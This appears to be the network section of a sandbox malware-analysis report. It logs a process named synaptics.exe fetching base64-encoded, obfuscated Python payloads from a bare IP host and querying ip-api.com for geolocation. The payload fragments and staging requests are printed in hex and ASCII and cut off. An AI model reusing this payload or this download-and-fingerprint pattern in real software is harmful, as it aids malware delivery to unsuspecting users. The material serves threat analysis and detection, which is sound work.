                                                                                                                                                                                                            Nov 13, 2024 13:26:34.277090073 CET1236INData Raw: 53 54 6c 4c 4d 46 46 5a 57 45 74 49 54 79 41 39 49 43 4a 55 54 6c 49 31 57 56 6b 30 52 54 46 42 4e 56 51 31 55 6c 45 32 49 67 6f 4a 64 6d 46 79 58 7a 56 47 54 55 6c 48 54 44 4a 45 55 55 56 59 49 44 30 67 4d 54 41 78 4e 44 6b 7a 4f 44 4d 77 4d 67
                                                                                                                                                                                                            Data Ascii: STlLMFFZWEtITyA9ICJUTlI1WVk0RTFBNVQ1UlE2IgoJdmFyXzVGTUlHTDJEUUVYID0gMTAxNDkzODMwMgoJdmFyX0lTR1U4S0M3SkE0NiA9ICI3RldNRE9SWjBMIgoJdmFyX083WDRUUVMyID0gIjlVSDkyQ1MwWVVDODYiCgl2YXJfNklTMkQxQzlCQ0ZNTCA9ICI4M0RQS0lXUlAwUFpWUCIKCXZhcl80RUNCUktFR1I0M0h
                                                                                                                                                                                                            Nov 13, 2024 13:26:34.277100086 CET1236INData Raw: 54 30 30 7a 55 53 49 4b 43 58 5a 68 63 6c 39 46 4e 54 42 52 53 54 42 49 4e 44 6c 47 52 6b 4a 54 49 44 30 67 4d 7a 63 33 4f 54 41 31 4d 7a 49 34 4f 51 6f 4a 64 6d 46 79 58 31 6c 59 4e 45 4a 4e 4f 56 56 42 4e 79 41 39 49 43 4a 48 56 30 39 53 53 6b
                                                                                                                                                                                                            Data Ascii: T00zUSIKCXZhcl9FNTBRSTBINDlGRkJTID0gMzc3OTA1MzI4OQoJdmFyX1lYNEJNOVVBNyA9ICJHV09SSkhLSTZGIgoJdmFyX1VQM0VYRiA9IDMwNjkxOTA2MDYKCXZhcl9WU01YSUM1R1E5OUMzTiA9IDk2NjgyNjc0ODEKCXZhcl9BMFQxODZVNzZITyA9ICJZUlkxQUFSNjVUNVpTMzRHIgoJdmFyX1EyOE5IMTIxWElPRSA
                                                                                                                                                                                                            Nov 13, 2024 13:26:34.277126074 CET848INData Raw: 51 6b 35 49 51 30 77 79 4e 54 41 33 52 69 49 4b 43 58 5a 68 63 6c 38 30 4e 55 56 51 54 44 56 5a 4d 55 70 48 52 46 5a 4c 57 43 41 39 49 43 4a 4e 54 46 42 59 53 6b 34 7a 4d 45 30 77 4f 46 6c 4c 55 53 49 4b 43 58 5a 68 63 6c 39 4f 53 56 63 32 57 6b
                                                                                                                                                                                                            Data Ascii: Qk5IQ0wyNTA3RiIKCXZhcl80NUVQTDVZMUpHRFZLWCA9ICJNTFBYSk4zME0wOFlLUSIKCXZhcl9OSVc2Wk05OUxGID0gNDc0ODA3NzYxMAoJdmFyX1hBMTBROUg5ID0gIk5QVVRQMVhJSDBHVVZSIgoJdmFyX1cxSElESjlJT080WkxGVSA9ICIzRlFYMDBFRjFCWk41OSIKCXZhcl9HWkhIQTUgPSA5NzMwNjUwMTI5Cgl2YXJ
                                                                                                                                                                                                            Nov 13, 2024 13:26:34.277141094 CET1236INData Raw: 43 58 5a 68 63 6c 38 35 53 30 4a 55 57 45 63 34 55 31 70 58 56 55 45 35 53 7a 59 67 50 53 41 69 4e 44 4a 56 57 6c 67 77 53 6c 5a 4e 55 79 49 4b 43 58 5a 68 63 6c 38 77 52 54 64 4f 56 6b 68 48 55 44 63 67 50 53 41 30 4e 44 6b 34 4f 44 67 79 4d 7a
                                                                                                                                                                                                            Data Ascii: CXZhcl85S0JUWEc4U1pXVUE5SzYgPSAiNDJVWlgwSlZNUyIKCXZhcl8wRTdOVkhHUDcgPSA0NDk4ODgyMzIzCgl2YXJfN0NaRjczTDVQID0gNjU5MzgzNzQ0NwoJdmFyX1c3R0FQMDcgPSAiMlJaSENHSVBYODkiCgl2YXJfQ0k4MzNQQ1ZBNTQ1RDUgPSAiU0s2MlBaQU82OURaSk4iCgl2YXJfRzkyWEpWQVk4RSA9IDU1NDI
                                                                                                                                                                                                            Nov 13, 2024 13:26:34.277151108 CET1236INData Raw: 49 44 45 79 4f 44 55 33 4d 6a 67 35 4f 54 59 4b 43 58 5a 68 63 6c 39 54 4f 45 52 4a 54 46 52 45 4d 7a 4a 4e 4f 54 56 47 54 43 41 39 49 44 59 30 4e 6a 45 77 4d 44 55 33 4f 54 41 4b 43 58 5a 68 63 6c 39 44 55 6b 70 4c 55 6a 5a 43 54 55 68 52 55 69
                                                                                                                                                                                                            Data Ascii: IDEyODU3Mjg5OTYKCXZhcl9TOERJTFREMzJNOTVGTCA9IDY0NjEwMDU3OTAKCXZhcl9DUkpLUjZCTUhRUiA9IDE5NDcyNjcxMzAKCXZhcl9PUUpCMTE3OSA9IDQ3MzEwOTQyNDIKCXZhcl9EMVlLVENVV0RONDc4ID0gIjJXSjFZQ1lOWEhOWiIKCXZhcl80WE0yNUJRUElOID0gIkoyVjZMWUhUWEtMWUpTUVo4IgoJdmFyX0Y
                                                                                                                                                                                                            Nov 13, 2024 13:26:34.277162075 CET1236INData Raw: 56 30 4e 50 52 56 52 4b 51 69 41 39 49 44 4d 78 4e 6a 49 32 4e 54 4d 32 4d 44 59 4b 5a 47 56 6d 49 48 4e 31 59 6c 38 35 53 6c 56 59 4d 45 78 59 53 54 68 46 54 7a 4e 58 57 6a 4a 52 56 54 64 44 4e 55 35 45 56 79 67 70 4f 67 6f 4a 64 6d 46 79 58 30
                                                                                                                                                                                                            Data Ascii: V0NPRVRKQiA9IDMxNjI2NTM2MDYKZGVmIHN1Yl85SlVYMExYSThFTzNXWjJRVTdDNU5EVygpOgoJdmFyX0NROUVPID0gNTk4MjQxNDc4OAoJdmFyX0dSNU5HREFLV0gyQTFSID0gIkpaSDNXUkVFU1pITFBUSyIKCXZhcl80RFpXQyA9ICJROUxCWE5JMVIzIgoJdmFyX0FTVzI5SlJVSE5IT09LTCA9IDQ0NTQ3NTg5MzEKCXZ
                                                                                                                                                                                                            Nov 13, 2024 13:26:34.277170897 CET1236INData Raw: 4d 44 41 79 4d 6a 45 79 4f 54 45 4b 43 58 5a 68 63 6c 39 55 55 56 68 44 4d 55 34 77 56 30 31 44 49 44 30 67 4e 7a 6b 33 4d 7a 45 32 4d 6a 6b 33 4f 51 6f 4a 64 6d 46 79 58 30 4a 4a 53 6c 52 52 4e 56 4a 44 53 79 41 39 49 43 4a 58 56 55 4a 55 57 6b
                                                                                                                                                                                                            Data Ascii: MDAyMjEyOTEKCXZhcl9UUVhDMU4wV01DID0gNzk3MzE2Mjk3OQoJdmFyX0JJSlRRNVJDSyA9ICJXVUJUWk5JQklRMlZORFhVSE4iCgl2YXJfUThXVzY2UDhKID0gNDgyOTEwNjQ1NAoJdmFyXzVRSTJINjdFSlJHVVYyMSA9IDk0NzMzOTg4NjAKCXZhcl9GT0o1QTNHV1RCTDIgPSA5ODc0NDEyMTQ0Cgl2YXJfWFg3R1FUTlB
                                                                                                                                                                                                            Nov 13, 2024 13:26:34.277180910 CET1236INData Raw: 4e 44 59 33 4d 44 63 4b 43 58 5a 68 63 6c 39 61 56 55 31 4f 57 6a 52 56 54 45 59 30 53 53 41 39 49 43 49 34 52 55 55 30 4e 46 51 34 52 30 67 69 43 67 6c 32 59 58 4a 66 4d 55 6b 7a 52 7a 4a 4f 4e 53 41 39 49 44 59 78 4d 44 51 34 4e 6a 55 7a 4d 6a
                                                                                                                                                                                                            Data Ascii: NDY3MDcKCXZhcl9aVU1OWjRVTEY0SSA9ICI4RUU0NFQ4R0giCgl2YXJfMUkzRzJONSA9IDYxMDQ4NjUzMjIKCXZhcl9aUDVYUk9SVlAxTCA9IDQ4OTUwMjczMzMKCXZhcl80M1pNSVo1VVdYVEYxVEsgPSAiWFVSMTNaQTIiCgl2YXJfRzZEWFFIMjIzSyA9ICJUUlNCNTg1Mzk2UjdaWCIKCXZhcl83Mk1SN1ZOV09FVUZBID0
                                                                                                                                                                                                            Nov 13, 2024 13:26:34.282430887 CET1236INData Raw: 4d 44 56 59 56 56 5a 49 4d 55 38 77 49 44 30 67 4d 7a 6b 34 4e 54 63 33 4e 54 55 34 4e 51 6f 4a 64 6d 46 79 58 30 34 30 54 6b 35 59 55 79 41 39 49 43 4a 4a 52 30 4d 33 52 6c 45 7a 53 46 46 4d 52 44 51 33 53 45 4d 7a 4f 54 45 69 43 67 6c 32 59 58
                                                                                                                                                                                                            Data Ascii: MDVYVVZIMU8wID0gMzk4NTc3NTU4NQoJdmFyX040Tk5YUyA9ICJJR0M3RlEzSFFMRDQ3SEMzOTEiCgl2YXJfMFpLMkJDWEc0UU1MID0gNzg0MDk2MzIxOAoJdmFyXzc3RUZTID0gIlNaRTBPN1ZPTkVIU0VBWDM3VyIKCXZhcl9DMURXMkxGWTg4TSA9IDkzMDQ0NjEyNjEKCXZhcl9NN05ISFBHUVRMTE5OID0gIktDRklGWFg


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            3192.168.2.44996042.96.10.8807804C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 13, 2024 13:26:41.572709084 CET122OUTGET /VOINE_BU HTTP/1.1
                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                            Host: 42.96.10.8
                                                                                                                                                                                                            User-Agent: Python-urllib/3.10
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Nov 13, 2024 13:26:42.768002987 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 13 Nov 2024 12:26:42 GMT
                                                                                                                                                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                                            Last-Modified: Fri, 01 Nov 2024 15:53:10 GMT
                                                                                                                                                                                                            ETag: "18ce8-625dbee861deb"
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            Content-Length: 101608
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Data Raw: 5a 47 56 6d 49 48 4e 31 59 6c 39 43 4d 45 52 58 4f 56 4a 54 52 6b 39 47 51 31 4a 56 4e 6c 4e 47 53 54 4d 78 4e 55 31 43 55 43 67 70 4f 67 6f 4a 64 6d 46 79 58 30 64 48 54 6b 34 32 52 6c 59 67 50 53 41 35 4e 54 6b 77 4f 44 55 77 4e 54 45 79 43 67 6c 32 59 58 4a 66 51 30 4e 50 51 31 56 48 55 6b 6c 4b 54 30 4e 59 53 69 41 39 49 43 4a 48 56 30 31 43 4e 54 46 47 52 31 46 61 53 44 52 4b 56 45 4a 58 53 53 49 4b 43 58 5a 68 63 6c 38 31 57 6c 59 32 54 46 63 78 52 79 41 39 49 43 4a 4d 53 6c 45 77 53 54 68 56 4d 53 49 4b 43 58 5a 68 63 6c 38 7a 51 6a 49 78 52 56 5a 52 4d 43 41 39 49 44 49 33 4d 54 55 7a 4e 6a 6b 33 4e 6a 59 4b 43 58 5a 68 63 6c 38 33 4d 6b 63 35 4d 79 41 39 49 43 49 32 4e 31 49 77 54 46 59 32 57 45 30 30 56 44 6c 43 4e 31 49 32 4e 31 4d 69 43 67 6c 32 59 58 4a 66 53 44 5a 56 4e 45 4d 30 4f 45 59 35 55 45 6c 4e 54 69 41 39 49 43 4a 42 56 55 70 4a 54 6a 56 53 52 30 63 31 54 44 42 43 51 30 46 54 56 55 77 69 43 67 6c 32 59 58 4a 66 4e 30 4a 4f 4d 31 6c 4b 57 6c 6b 67 50 53 41 30 4e 7a 55 7a 4d 7a [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: ZGVmIHN1Yl9CMERXOVJTRk9GQ1JVNlNGSTMxNU1CUCgpOgoJdmFyX0dHTk42RlYgPSA5NTkwODUwNTEyCgl2YXJfQ0NPQ1VHUklKT0NYSiA9ICJHV01CNTFGR1FaSDRKVEJXSSIKCXZhcl81WlY2TFcxRyA9ICJMSlEwSThVMSIKCXZhcl8zQjIxRVZRMCA9IDI3MTUzNjk3NjYKCXZhcl83Mkc5MyA9ICI2N1IwTFY2WE00VDlCN1I2N1MiCgl2YXJfSDZVNEM0OEY5UElNTiA9ICJBVUpJTjVSR0c1TDBCQ0FTVUwiCgl2YXJfN0JOM1lKWlkgPSA0NzUzMzQ3MjM2Cgl2YXJfRkZDTElPT01XID0gNjU4NDIyMjY1NQoJdmFyXzBTNFFTQTUwNjU4VksgPSA2NTUyMDUzMDE4Cgl2YXJfMUJCTjdMWVUxQyA9ICJPWTdFSU9EU1gwT0lTTEkiCgl2YXJfWjRPRkxaVUggPSA4NTk1NDQzNzg5Cgl2YXJfREJUQU9MV0s1UUEgPSA1ODY3NDQ5NjUzCgl2YXJfSTdSV1NMNkRQOVFOQiA9ICJUSFlKUlVHQSIKCXZhcl9ZSFlQTVYyTzdUVks1SjAgPSAiQTVURzg4T0YxOVZCMCIKCXZhcl9YR1ExNUMgPSAiNkJOS0QzTEUiCgl2YXJfODBDQjYzQlNWRVEzU1ogPSA1NzYzMzM5NTY3Cgl2YXJfRkhQTjAgPSAiS0xVRU9UN1lHSFAxNkNPIgoJdmFyX1Y0TExPNDJGID0gIk9KWFJOQVZaR1ZFMiIKCXZhcl9VVzJSM0RHVTcgPSAiNVpaNjdIVzYyUkIiCgl2YXJfUldCSTJEMFU5RjhCNSA9ICI0MThaSkxUTEZYRUhPIgoJdmFyX0lRS0NMWkxQRDUgPSAiQ1JUREY3NUxJSTkiCgl2YXJfM09DVjdSSEExR0wwQlEgPSAzNTQ1OTY5NDk5Cgl2
                                                                                                                                                                                                            Nov 13, 2024 13:26:42.768023014 CET1236INData Raw: 59 58 4a 66 52 54 4a 52 52 7a 52 48 49 44 30 67 4d 6a 49 79 4e 54 59 30 4e 44 55 31 4e 77 70 6b 5a 57 59 67 63 33 56 69 58 7a 42 47 54 6c 68 43 53 56 6c 58 52 6a 52 4f 54 45 38 34 4d 56 55 32 57 6c 5a 42 51 6b 39 52 4b 43 6b 36 43 67 6c 32 59 58
                                                                                                                                                                                                            Data Ascii: YXJfRTJRRzRHID0gMjIyNTY0NDU1NwpkZWYgc3ViXzBGTlhCSVlXRjROTE84MVU2WlZBQk9RKCk6Cgl2YXJfOVZEN1ZJUiA9ICJXTEwwTEg0RFQ2OTk1RFVKWEYiCgl2YXJfQkJMRE5UWENWRFYgPSAiVEQ4NTlTSllDSEowSDdYWCIKCXZhcl9EMjRBS1ZXNDRSUVo3N0QgPSAiS0lVWUhTN0pLTyIKCXZhcl9LSE5YQ1QgPSA
                                                                                                                                                                                                            Nov 13, 2024 13:26:42.768033028 CET1236INData Raw: 53 54 6c 4c 4d 46 46 5a 57 45 74 49 54 79 41 39 49 43 4a 55 54 6c 49 31 57 56 6b 30 52 54 46 42 4e 56 51 31 55 6c 45 32 49 67 6f 4a 64 6d 46 79 58 7a 56 47 54 55 6c 48 54 44 4a 45 55 55 56 59 49 44 30 67 4d 54 41 78 4e 44 6b 7a 4f 44 4d 77 4d 67
                                                                                                                                                                                                            Data Ascii: STlLMFFZWEtITyA9ICJUTlI1WVk0RTFBNVQ1UlE2IgoJdmFyXzVGTUlHTDJEUUVYID0gMTAxNDkzODMwMgoJdmFyX0lTR1U4S0M3SkE0NiA9ICI3RldNRE9SWjBMIgoJdmFyX083WDRUUVMyID0gIjlVSDkyQ1MwWVVDODYiCgl2YXJfNklTMkQxQzlCQ0ZNTCA9ICI4M0RQS0lXUlAwUFpWUCIKCXZhcl80RUNCUktFR1I0M0h
                                                                                                                                                                                                            Nov 13, 2024 13:26:42.768042088 CET636INData Raw: 54 30 30 7a 55 53 49 4b 43 58 5a 68 63 6c 39 46 4e 54 42 52 53 54 42 49 4e 44 6c 47 52 6b 4a 54 49 44 30 67 4d 7a 63 33 4f 54 41 31 4d 7a 49 34 4f 51 6f 4a 64 6d 46 79 58 31 6c 59 4e 45 4a 4e 4f 56 56 42 4e 79 41 39 49 43 4a 48 56 30 39 53 53 6b
                                                                                                                                                                                                            Data Ascii: T00zUSIKCXZhcl9FNTBRSTBINDlGRkJTID0gMzc3OTA1MzI4OQoJdmFyX1lYNEJNOVVBNyA9ICJHV09SSkhLSTZGIgoJdmFyX1VQM0VYRiA9IDMwNjkxOTA2MDYKCXZhcl9WU01YSUM1R1E5OUMzTiA9IDk2NjgyNjc0ODEKCXZhcl9BMFQxODZVNzZITyA9ICJZUlkxQUFSNjVUNVpTMzRHIgoJdmFyX1EyOE5IMTIxWElPRSA
                                                                                                                                                                                                            Nov 13, 2024 13:26:42.768052101 CET1236INData Raw: 4d 7a 67 34 4d 6a 59 78 43 6d 52 6c 5a 69 42 7a 64 57 4a 66 56 46 42 4d 52 6b 30 31 4e 45 6c 61 57 6a 51 31 55 30 6f 78 52 31 41 30 56 45 59 77 53 44 59 6f 4b 54 6f 4b 43 58 5a 68 63 6c 39 48 54 30 35 46 53 30 35 4f 53 6c 51 35 57 45 6c 42 4e 46
                                                                                                                                                                                                            Data Ascii: Mzg4MjYxCmRlZiBzdWJfVFBMRk01NElaWjQ1U0oxR1A0VEYwSDYoKToKCXZhcl9HT05FS05OSlQ5WElBNFYgPSA2MzQ5MTE4OTEwCgl2YXJfSkszN0hXWCA9IDE1MjM3NTUzNzUKCXZhcl9GRVo2WFdGMkNQID0gMzk2MzEyNjUwNgoJdmFyX1YzQlFJODUgPSAiSlJWRUdNN1FFU09XVkg3M1QiCgl2YXJfU0dKMlBVVjkzQjI
                                                                                                                                                                                                            Nov 13, 2024 13:26:42.768060923 CET1236INData Raw: 55 31 4a 55 49 44 30 67 4e 54 4d 78 4d 44 6b 32 4f 44 59 32 4d 67 6f 4a 64 6d 46 79 58 31 4a 5a 4e 6a 6c 51 49 44 30 67 4d 7a 41 77 4f 44 59 33 4e 44 55 7a 4d 67 6f 4a 64 6d 46 79 58 30 64 4a 4e 6c 55 31 4e 54 5a 4d 57 6a 6c 58 52 30 68 48 49 44
                                                                                                                                                                                                            Data Ascii: U1JUID0gNTMxMDk2ODY2MgoJdmFyX1JZNjlQID0gMzAwODY3NDUzMgoJdmFyX0dJNlU1NTZMWjlXR0hHID0gODQzNjk3MDE1NgoJdmFyX0tISzFXOVZPTVQgPSAzNTUwMzc3Njk1Cgl2YXJfNTQ3N1IxQk1NQTEgPSAxNjE4OTAyNTQyCgl2YXJfSkk0MlZVNiA9ICI5VldZVzFKUSIKCXZhcl85S0JUWEc4U1pXVUE5SzYgPSA
                                                                                                                                                                                                            Nov 13, 2024 13:26:42.768070936 CET1236INData Raw: 52 79 41 39 49 43 4a 4e 4d 55 52 59 53 6a 46 4f 49 67 6f 4a 64 6d 46 79 58 31 41 32 4f 46 68 52 55 55 4d 67 50 53 41 69 55 55 78 4d 57 56 70 42 57 45 73 35 54 6c 70 50 4e 56 52 4b 55 43 49 4b 43 58 5a 68 63 6c 38 32 57 6c 49 7a 4f 55 6c 56 55 31
                                                                                                                                                                                                            Data Ascii: RyA9ICJNMURYSjFOIgoJdmFyX1A2OFhRUUMgPSAiUUxMWVpBWEs5TlpPNVRKUCIKCXZhcl82WlIzOUlVU1JEMkpWID0gMzI1ODEwMTg5NQoJdmFyX084T1BITDZMODk0OUs5ID0gMzUyODkzODY0NAoJdmFyXzA2NjMwQkExMkJWREMgPSA1NjcyNzQ0MTE2Cgl2YXJfOUczQUZZMCA9IDEyODU3Mjg5OTYKCXZhcl9TOERJTFR
                                                                                                                                                                                                            Nov 13, 2024 13:26:42.768079996 CET1236INData Raw: 50 53 41 7a 4d 44 59 32 4f 44 4d 78 4d 7a 45 79 43 67 6c 32 59 58 4a 66 54 46 45 31 55 31 46 52 52 6c 63 30 56 45 51 35 49 44 30 67 4e 44 55 78 4f 44 45 34 4d 7a 63 79 4e 51 6f 4a 64 6d 46 79 58 7a 46 58 57 54 52 59 4d 54 56 4f 52 31 46 55 55 6b
                                                                                                                                                                                                            Data Ascii: PSAzMDY2ODMxMzEyCgl2YXJfTFE1U1FRRlc0VEQ5ID0gNDUxODE4MzcyNQoJdmFyXzFXWTRYMTVOR1FUUkcgPSAiRVJOWEI2T0syVDNIT00wMU80IgoJdmFyX1Y4NTQ0OVdCVyA9ICJJRzUyTE4yRFQ1OEgyOEpYRCIKCXZhcl8zNEVLQyA9ICJEVUFBMjIxUE1aIgoJdmFyX1NQSzNUV0NPRVRKQiA9IDMxNjI2NTM2MDYKZGV
                                                                                                                                                                                                            Nov 13, 2024 13:26:42.768088102 CET1236INData Raw: 43 6d 52 6c 5a 69 42 7a 64 57 4a 66 4d 31 56 58 4e 45 52 56 54 6b 55 35 51 6c 5a 50 4d 55 63 31 54 6c 45 78 4d 7a 63 31 52 45 55 6f 4b 54 6f 4b 43 58 5a 68 63 6c 38 34 4d 6b 73 77 4d 6c 4a 46 52 54 64 4b 4d 6b 4d 67 50 53 41 69 4d 6a 6b 32 55 6c
                                                                                                                                                                                                            Data Ascii: CmRlZiBzdWJfM1VXNERVTkU5QlZPMUc1TlExMzc1REUoKToKCXZhcl84MkswMlJFRTdKMkMgPSAiMjk2UlNGMFlZSjJXM1RGS08iCgl2YXJfUzJWTDQ5Wlo1S0lHODEgPSA0MTQwODg4OTc3Cgl2YXJfUzJKWThVWjdWID0gIlBDTUExNEVEIgoJdmFyX0NJTUs5NUo3M0FPNSA9IDUxMDAyMjEyOTEKCXZhcl9UUVhDMU4wV01
                                                                                                                                                                                                            Nov 13, 2024 13:26:42.768098116 CET1060INData Raw: 4d 56 6f 67 50 53 41 69 4d 6c 5a 45 57 45 31 4e 52 31 6c 52 52 44 4e 49 49 67 6f 4a 64 6d 46 79 58 7a 4d 79 4d 45 55 31 56 6a 4e 44 53 31 51 77 52 54 56 4b 51 53 41 39 49 43 4a 47 52 54 4a 5a 4d 6a 4a 45 57 6b 78 50 53 56 4e 50 49 67 6f 4a 64 6d
                                                                                                                                                                                                            Data Ascii: MVogPSAiMlZEWE1NR1lRRDNIIgoJdmFyXzMyMEU1VjNDS1QwRTVKQSA9ICJGRTJZMjJEWkxPSVNPIgoJdmFyX1VWR1c5U1ggPSAyNTY2ODE0ODYyCgl2YXJfTFBPVDAgPSAzNzQ1NDAxODg4Cgl2YXJfNDdWRk40ID0gOTgwMzg2NzgzMQoJdmFyX1BOSDRBNkJBVDdYTSA9IDc4MDc4NDY3MDcKCXZhcl9aVU1OWjRVTEY0SSA
                                                                                                                                                                                                            Nov 13, 2024 13:26:42.773200035 CET1236INData Raw: 53 44 6b 35 4f 44 45 33 53 44 4e 4e 49 44 30 67 49 6a 41 30 51 55 63 79 56 55 77 77 54 53 49 4b 43 58 5a 68 63 6c 39 47 55 30 45 34 57 45 6c 4d 4e 54 42 52 54 30 77 67 50 53 41 7a 4d 44 41 77 4f 44 49 7a 4f 54 55 78 43 67 6c 32 59 58 4a 66 55 54
                                                                                                                                                                                                            Data Ascii: SDk5ODE3SDNNID0gIjA0QUcyVUwwTSIKCXZhcl9GU0E4WElMNTBRT0wgPSAzMDAwODIzOTUxCgl2YXJfUThDMFJNWlMgPSAiQ1JTODJVRjYiCgl2YXJfUDhTTU1ZWURYOUFETkwgPSA4NzE2OTM3Nzc2Cgl2YXJfN0RPWFdKID0gNDEzNTIwMzkzNgoJdmFyX0hTN0dPSkhBSkYgPSAxOTQ2Mjg3Njc5Cgl2YXJfVVVNSUggPSA


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            4192.168.2.450043208.95.112.1807804C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 13, 2024 13:27:11.913110971 CET158OUTGET /json/?fields=8195 HTTP/1.1
                                                                                                                                                                                                            Host: ip-api.com
                                                                                                                                                                                                            User-Agent: python-requests/2.32.3
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Nov 13, 2024 13:27:12.812827110 CET247INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 13 Nov 2024 12:27:11 GMT
                                                                                                                                                                                                            Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                            Content-Length: 71
                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                            X-Ttl: 60
                                                                                                                                                                                                            X-Rl: 44
                                                                                                                                                                                                            Data Raw: 7b 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 71 75 65 72 79 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 22 7d
                                                                                                                                                                                                            Data Ascii: {"country":"United States","countryCode":"US","query":"173.254.250.82"}
                                                                                                                                                                                                            Nov 13, 2024 13:27:12.813237906 CET247INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 13 Nov 2024 12:27:11 GMT
                                                                                                                                                                                                            Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                            Content-Length: 71
                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                            X-Ttl: 60
                                                                                                                                                                                                            X-Rl: 44
                                                                                                                                                                                                            Data Raw: 7b 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 71 75 65 72 79 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 22 7d
                                                                                                                                                                                                            Data Ascii: {"country":"United States","countryCode":"US","query":"173.254.250.82"}


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            5192.168.2.45008942.96.10.880
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 13, 2024 13:27:28.474392891 CET218OUTGET /SCAN_900 HTTP/1.1
                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                            Host: 42.96.10.8
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Nov 13, 2024 13:27:29.638335943 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 13 Nov 2024 12:27:29 GMT
                                                                                                                                                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                                            Last-Modified: Fri, 01 Nov 2024 15:48:02 GMT
                                                                                                                                                                                                            ETag: "173cc-625dbdc29cca5"
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            Content-Length: 95180
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Data Raw: 58 31 38 33 4e 7a 55 34 4d 6a 45 77 4d 54 63 35 4e 7a 41 7a 49 44 30 67 4d 41 70 66 58 7a 63 33 4e 54 67 79 4d 54 41 78 4e 7a 6b 33 4d 44 4d 67 4b 7a 30 67 4d 51 70 30 63 6e 6b 36 43 69 41 67 49 43 42 79 59 57 6c 7a 5a 53 42 4e 5a 57 31 76 63 6e 6c 46 63 6e 4a 76 63 69 68 66 58 7a 63 33 4e 54 67 79 4d 54 41 78 4e 7a 6b 33 4d 44 4d 70 43 6d 56 34 59 32 56 77 64 43 42 4e 5a 57 31 76 63 6e 6c 46 63 6e 4a 76 63 69 42 68 63 79 42 66 58 7a 59 33 4e 6a 6b 30 4e 6a 63 78 4f 44 51 34 4d 54 4d 36 43 69 41 67 49 43 42 70 5a 69 42 66 58 7a 59 33 4e 6a 6b 30 4e 6a 63 78 4f 44 51 34 4d 54 4d 75 59 58 4a 6e 63 31 73 77 58 53 41 39 50 53 41 78 4f 67 6f 67 49 43 41 67 49 43 41 67 49 47 64 73 62 32 4a 68 62 48 4d 6f 4b 56 73 6e 55 6c 39 46 58 30 52 66 58 30 46 66 56 6c 39 66 58 31 39 66 58 31 38 6e 58 53 41 39 49 47 4a 76 62 32 77 67 61 57 59 67 59 6d 39 76 62 43 68 69 62 32 39 73 4b 47 4a 76 62 32 77 6f 59 6d 39 76 62 43 6b 70 4b 53 41 38 49 47 4a 76 62 32 77 6f 64 48 6c 77 5a 53 68 70 62 6e 51 6f 4d 54 4d 78 4e 79 [TRUNCATED]
